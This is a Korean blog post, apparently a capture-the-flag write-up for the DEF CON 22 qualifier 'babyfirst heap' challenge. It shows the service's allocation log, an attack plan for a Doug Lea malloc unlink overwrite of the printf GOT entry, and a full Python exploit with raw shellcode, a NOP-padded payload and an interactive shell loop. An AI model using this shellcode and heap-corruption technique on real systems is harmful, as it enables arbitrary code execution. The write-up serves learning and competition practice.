2014년 5월 24일 토요일

Defcon 22 quals - babyfirst heap writeup 

mangoui-MacBook-Pro:~ kjungi704$ nc 10.211.55.4 8989 

Welcome to your first heap overflow...
I am going to allocate 20 objects...
Using Dougle Lee Allocator 2.6.1...
Goodluck!

Exit function pointer is at 804C8AC address.
[ALLOC][loc=80A9008][size=1246]
[ALLOC][loc=80A94F0][size=1121]
[ALLOC][loc=80A9958][size=947]
[ALLOC][loc=80A9D10][size=741]
[ALLOC][loc=80AA000][size=706]
[ALLOC][loc=80AA2C8][size=819]
[ALLOC][loc=80AA600][size=673]
[ALLOC][loc=80AA8A8][size=1004]
[ALLOC][loc=80AAC98][size=952]
[ALLOC][loc=80AB058][size=755]
[ALLOC][loc=80AB350][size=260]
[ALLOC][loc=80AB458][size=877]
[ALLOC][loc=80AB7D0][size=1245]
[ALLOC][loc=80ABCB8][size=1047]
[ALLOC][loc=80AC0D8][size=1152]
[ALLOC][loc=80AC560][size=1047]
[ALLOC][loc=80AC980][size=1059]
[ALLOC][loc=80ACDA8][size=906]
[ALLOC][loc=80AD138][size=879]
[ALLOC][loc=80AD4B0][size=823]
Write to object [size=260]:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Copied 93 bytes.
[FREE][address=80A9008]
[FREE][address=80A94F0]
[FREE][address=80A9958]
[FREE][address=80A9D10]
[FREE][address=80AA000]
[FREE][address=80AA2C8]
[FREE][address=80AA600]
[FREE][address=80AA8A8]
[FREE][address=80AAC98]
[FREE][address=80AB058]
[FREE][address=80AB350]
[FREE][address=80AB458]
[FREE][address=80AB7D0]
[FREE][address=80ABCB8]
[FREE][address=80AC0D8]
[FREE][address=80AC560]
[FREE][address=80AC980]
[FREE][address=80ACDA8]
[FREE][address=80AD138]
[FREE][address=80AD4B0]
Did you forget to read the flag with your shellcode?
Exiting

Doug lee malloc exploit chal!!!


* 11th block = size 260 fixed
* except 11th , size random


--IDEA-------------------------------------------------------------
1. fill 11th block with shellcode+NOP
2. make fake chunk size=261, fd = printf_got, bk = 11th block addr
-------------------------------------------------------------------


#!/usr/bin/python
from struct import *
from socket import *

p = lambda x : pack("<L",x)
up = lambda x : unpack("<L",x)[0]

s = socket(AF_INET,SOCK_STREAM)
s.connect(('10.211.55.4',8989))

shellcode = "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2"+\
	      "\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69"+\
	      "\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81"
printf_got = 0x804bffc
size = 260
fd = printf_got
bk = 0
payload = ""

print s.recv(1024)
hehe = s.recv(2056)
hehe = hehe.split("\n")
for i in hehe:
	if i.find("size=260"):
		bk = int(i[12:19],16)
		break

payload += shellcode.ljust(260,"\x90")
payload += p(size)
payload += p(fd)
payload += p(bk)

s.send(payload+"\n")
print s.recv(2000)

while 1:
	print s.recv(1024)
	cmd = raw_input("$ ")
	s.send(cmd+"\n")

CLEAR!
작성자: 시간:
라벨:

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)